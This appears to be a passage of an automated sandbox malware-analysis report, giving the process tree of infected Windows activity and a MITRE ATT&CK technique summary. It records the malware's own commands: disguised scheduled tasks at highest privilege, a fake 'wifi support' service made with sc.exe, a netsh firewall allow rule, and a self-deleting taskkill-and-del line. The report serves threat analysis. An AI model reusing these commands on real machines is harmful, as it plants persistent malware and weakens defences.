                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --mojo-platform-channel-handle=3280 /prefetch:8
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:7788
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3304 /prefetch:2
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:9760
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --mojo-platform-channel-handle=3752 /prefetch:8
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:7292
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --mojo-platform-channel-handle=3796 /prefetch:8
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:10060
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --mojo-platform-channel-handle=2332 /prefetch:8
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:8172
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,16109295033119475351,16938993877606911514,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10136_1176781344" --mojo-platform-channel-handle=2208 /prefetch:8
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:2148
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_AD85.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:10228
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                      PID:5780
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:7460
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 624
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                            PID:6400
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                        schtasks.exe /create /tn "HL1HFO7St_5UaRmPmnWS92sE" /sc ONLOGON /tr "'C:\odt\HL1HFO7St_5UaRmPmnWS92sE.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                        PID:7736
                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:6600
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{71721f21-78d5-7844-9ebb-d7585483d336}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:7600
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                              DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:7376
                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:3412
                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:6840
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                  schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Policies\WerFault.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                  PID:8920
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:8376
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer\SearchUI.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                    PID:8452
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:8568
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:8708
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:5892
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\940.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\940.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:7248
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 940.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\940.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:7044
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                  taskkill /im 940.exe /f
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                  PID:8420
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                  PID:9756
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:8788
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8816
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:8864
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1297.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1297.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:8196
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7244
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1603.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1603.exe
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8936
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\khzrwvkd\
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5448
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\veqwgbxn.exe" C:\Windows\SysWOW64\khzrwvkd\
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6976
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" create khzrwvkd binPath= "C:\Windows\SysWOW64\khzrwvkd\veqwgbxn.exe /d\"C:\Users\Admin\AppData\Local\Temp\1603.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:8656
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" description khzrwvkd "wifi internet conection"
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:8960
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" start khzrwvkd
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:9032
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\tcouezvl.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\tcouezvl.exe" /d"C:\Users\Admin\AppData\Local\Temp\1603.exe"
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5084
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\anenfsuo.exe" C:\Windows\SysWOW64\khzrwvkd\
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:7384
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" config khzrwvkd binPath= "C:\Windows\SysWOW64\khzrwvkd\anenfsuo.exe /d\"C:\Users\Admin\tcouezvl.exe\""
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6588
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" start khzrwvkd
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5008
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1652
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2880.bat" "
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:9104
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:8944
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1620
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:8992
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                        MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:8404
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\25B4.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\25B4.exe
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:8948
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2DB4.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2DB4.exe
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:6436
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3779.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3779.exe
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:8508
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3779.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\3779.exe"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:6480
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:8012
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1252
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:8220
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:6208
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6428
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:368
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:8308
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:8456
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8576
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8940
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5208
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9112
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8956
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4052
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7272
                                                                                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6316

                                                                                                                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                                                                                                                                                                                                                              New Service

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1050

                                                                                                                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                              New Service

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1050

                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                              6
                                                                                                                                                                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                              6
                                                                                                                                                                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                                                                                                                                                                              Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                              1
